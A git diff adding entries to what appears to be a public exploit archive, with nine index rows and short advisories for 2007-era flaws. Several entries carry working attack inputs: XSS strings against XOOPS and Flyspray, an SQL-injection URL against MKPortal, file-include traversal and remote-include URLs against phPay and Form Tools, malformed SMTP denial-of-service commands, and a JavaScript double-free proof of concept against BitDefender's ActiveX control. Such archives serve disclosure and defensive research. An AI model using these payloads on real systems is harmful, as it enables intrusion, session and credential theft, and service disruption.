diff --git a/files.csv b/files.csv
index f8b0c57f7..97c4095a9 100755
--- a/files.csv
+++ b/files.csv
@@ -27706,3 +27706,12 @@ id,file,description,date,author,platform,type,port
 30880,platforms/php/webapps/30880.txt,"Bitweaver 1.x/2.0 search/index.php highlight Parameter SQL Injection",2007-11-10,Doz,php,webapps,0
 30881,platforms/php/webapps/30881.txt,"PHP-Nuke 8.0 autohtml.php Local File Include Vulnerability",2007-11-10,d3v1l,php,webapps,0
 30882,platforms/hardware/remote/30882.txt,"Thomson SpeedTouch 716 URL Parameter Cross-Site Scripting Vulnerability",2007-11-10,"Remco Verhoef",hardware,remote,0
+30883,platforms/windows/remote/30883.js,"BitDefender Antivirus 2008 bdelev.dll ActiveX Control Double Free Vulnerability",2007-11-11,"Lionel d'Hauenens",windows,remote,0
+30884,platforms/php/webapps/30884.txt,"XOOPS 2.2.5 register.php Cross-Site Scripting Vulnerability",2007-11-12,"Omer Singer",php,webapps,0
+30885,platforms/multiple/dos/30885.txt,"QK SMTP Server Malformed Commands Multiple Remote Denial of Service Vulnerabilities",2007-12-13,"Juan Pablo Lopez Yacubian",multiple,dos,0
+30886,platforms/php/webapps/30886.txt,"MKPortal 1.1 Gallery Module SQL Injection Vulnerability",2007-12-13,"Sw33t h4cK3r",php,webapps,0
+30887,platforms/php/webapps/30887.txt,"phPay 2.2.1 Windows Installations Local File Include Vulnerability",2007-12-15,"Michael Brooks",php,webapps,0
+30888,platforms/php/webapps/30888.txt,"phpRPG 0.8 /tmp Directory PHPSESSID Cookie Session Hijacking",2007-12-15,"Michael Brooks",php,webapps,0
+30889,platforms/php/webapps/30889.txt,"WordPress 2.3.1 Unauthorized Post Access Vulnerability",2007-12-15,"Michael Brooks",php,webapps,0
+30890,platforms/php/webapps/30890.txt,"Black Sheep Web Software Form Tools 1.5 Multiple Remote File Include Vulnerabilities",2007-12-14,RoMaNcYxHaCkEr,php,webapps,0
+30891,platforms/php/webapps/30891.txt,"Flyspray 0.9.9 Multiple Cross-Site Scripting Vulnerabilities",2007-12-09,"KAWASHIMA Takahiro",php,webapps,0
diff --git a/platforms/multiple/dos/30885.txt b/platforms/multiple/dos/30885.txt
new file mode 100755
index 000000000..832a15905
--- /dev/null
+++ b/platforms/multiple/dos/30885.txt
@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/26856/info
+
+QK SMTP Server is prone to multiple remote denial-of-service vulnerabilities that occur when handling malformed SMTP commands.
+
+An attacker can exploit these issues to crash the affected application, denying service to legitimate users.
+
+These issues affects QK SMTP Server 3; other versions may also be affected.
+
+HELO ../A/ * 950
+MAIL FROM: ../A/ * 950
+RCPT TO: ../A/ * 950
+data
+../A/ * 950 
\ No newline at end of file
diff --git a/platforms/php/webapps/30884.txt b/platforms/php/webapps/30884.txt
new file mode 100755
index 000000000..f7e609720
--- /dev/null
+++ b/platforms/php/webapps/30884.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/26835/info
+
+XOOPS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+XOOPS 2.2.5 is vulnerable; prior versions may also be affected. 
+
+http://www.example.com/xoops/modules/profile/register.php?>'"><script>alert('XSS');</script>
\ No newline at end of file
diff --git a/platforms/php/webapps/30886.txt b/platforms/php/webapps/30886.txt
new file mode 100755
index 000000000..9ef39c4dc
--- /dev/null
+++ b/platforms/php/webapps/30886.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/26860/info
+
+MKPortal is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in SQL queries.
+
+A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
+
+This issue affects MKPortal M1.1 RC1; other versions may also be vulnerable. 
+
+http://www.example.com/index.php?ind=gallery&op=foto_show&ida=(sql) 
\ No newline at end of file
diff --git a/platforms/php/webapps/30887.txt b/platforms/php/webapps/30887.txt
new file mode 100755
index 000000000..c5cb75d4f
--- /dev/null
+++ b/platforms/php/webapps/30887.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/26881/info
+
+phPay is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. The vulnerability resides in code that was intended to protect against file-include attacks. It was found that the protection routines may be bypassed on Windows installations.
+
+Exploiting this issue may allow an unauthorized user to view files and execute local scripts. 
+
+http://www.example.com/phpayv2.02a/main.php?config=eregi.inc.php\\..\\admin\\.htaccess
+
+The following example was provided in cases where the PHP 'magic_quotes_gpc' directive is enabled:
+
+http://www.example.com/phpayv2.02a/main.php?config=eregi.inc.php\..\admin\.htaccess 
\ No newline at end of file
diff --git a/platforms/php/webapps/30888.txt b/platforms/php/webapps/30888.txt
new file mode 100755
index 000000000..1b7520576
--- /dev/null
+++ b/platforms/php/webapps/30888.txt
@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/26884/info
+
+phpRPG is prone to two vulnerabilities:
+
+- An SQL-injection vulnerability
+- A vulnerability that lets remote attackers gain access to sessions.
+
+Exploiting these issues may allow an unauthorized user to steal sessions, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+This issue affects phpRPG 0.8.0; other versions may also be affected. 
+
+http://www.example.com/phpRPG-0.8.0/tmp/ 
\ No newline at end of file
diff --git a/platforms/php/webapps/30889.txt b/platforms/php/webapps/30889.txt
new file mode 100755
index 000000000..08ba36696
--- /dev/null
+++ b/platforms/php/webapps/30889.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/26885/info
+
+WordPress is prone to a vulnerability that lets unauthorized users read draft posts before they have been published.
+
+This issue affects WordPress 2.3.1; other versions may also be affected.
+
+NOTE: This BID is being reinstated because further investigation reveals that the application is vulnerable. The exploit URI supplied in the initial report was not sufficient to trigger the issue, which led to the vulnerability claim being refuted. However, follow-up information from the reporter included a URI that does trigger the issue.
+
+http://www.example.com/wordpress/index.php/wp-admin/ 
\ No newline at end of file
diff --git a/platforms/php/webapps/30890.txt b/platforms/php/webapps/30890.txt
new file mode 100755
index 000000000..e4415a19f
--- /dev/null
+++ b/platforms/php/webapps/30890.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/26889/info
+
+Black Sheep Web Software Form Tools is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
+
+These issues affect Form Tools 1.5.0b; other versions may also be vulnerable. 
+
+http://www.example.com/global/templates/admin_page_open.php?g_root_dir=http://www.example2.com
+http://www.example.com/global/templates/client_page_open.php?g_root_dir=http://www.example2.com 
\ No newline at end of file
diff --git a/platforms/php/webapps/30891.txt b/platforms/php/webapps/30891.txt
new file mode 100755
index 000000000..34aa0dc8b
--- /dev/null
+++ b/platforms/php/webapps/30891.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/26891/info
+
+Flyspray is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+These issues affect Flyspray 0.9.9 - 0.9.9.3.
+
+http://www.example.com/index.php?do=index&dummy=dummy');alert('XSS');void('
+http://www.example.com/index.php?do=details&task_id=1174&details=');alert('XSS 
\ No newline at end of file
diff --git a/platforms/windows/remote/30883.js b/platforms/windows/remote/30883.js
new file mode 100755
index 000000000..7bd24b0c9
--- /dev/null
+++ b/platforms/windows/remote/30883.js
@@ -0,0 +1,46 @@
+source: http://www.securityfocus.com/bid/26824/info
+
+A BitDefender Antivirus 2008 ActiveX control is prone a double-free vulnerability because of a flaw in the way that the 'bdelev.dll' library handles certain object data prior to returning it.
+
+Successfully exploiting this issue allows remote attackers to execute arbitrary code in the context of the application using the ActiveX control (typically Internet Explorer). Failed exploit attempts likely result in denial-of-service conditions.
+
+this.Oleaut32 = new Array();
+this.Oleaut32["cache"] = new Array();
+this.base = "A";
+while (base.length<0x8000) base+= base;
+this.base = base.substring (0, (0x8000-6)/2);
+CollectGarbage();
+3
+// Fill the cache with block of maximum size
+for (i=0;i<6;i++)
+{
+this.Oleaut32["cache"].push(base.substring (0, (0x20-6)/2));
+this.Oleaut32["cache"].push(base.substring (0, (0x40-6)/2));
+this.Oleaut32["cache"].push(base.substring (0, (0x100-6)/2));
+this.Oleaut32["cache"].push(base.substring (0, (0x8000-6)/2));
+}
+this.bitdefender = new ActiveXObject('bdelev.ElevatedHelperClass.1');
+// free cache of oleaut32
+delete Oleaut32["cache"];
+CollectGarbage();
+// POC
+for (pid=0;pid<4000;pid+=4)
+{
+try
+{
+// Find first Module_Path
+var Module_Path = bitdefender.Proc_GetName_PSAPI (pid);
+// Display the original string in free block memory
+///////////////////////////////////////////////////
+alert (Module_Path); -> C:\Windows\... (exemple)
+/////////////////////
+// Uses free block
+var y = base.substring(0,Module_Path.length);
+// Display the result of the crushing of the memory
+///////////////////////////////////////////////////
+alert (Module_Path); -> AAAAAAAAAAAA...
+/////////////////////
+break;
+}
+catch(e) {}
+}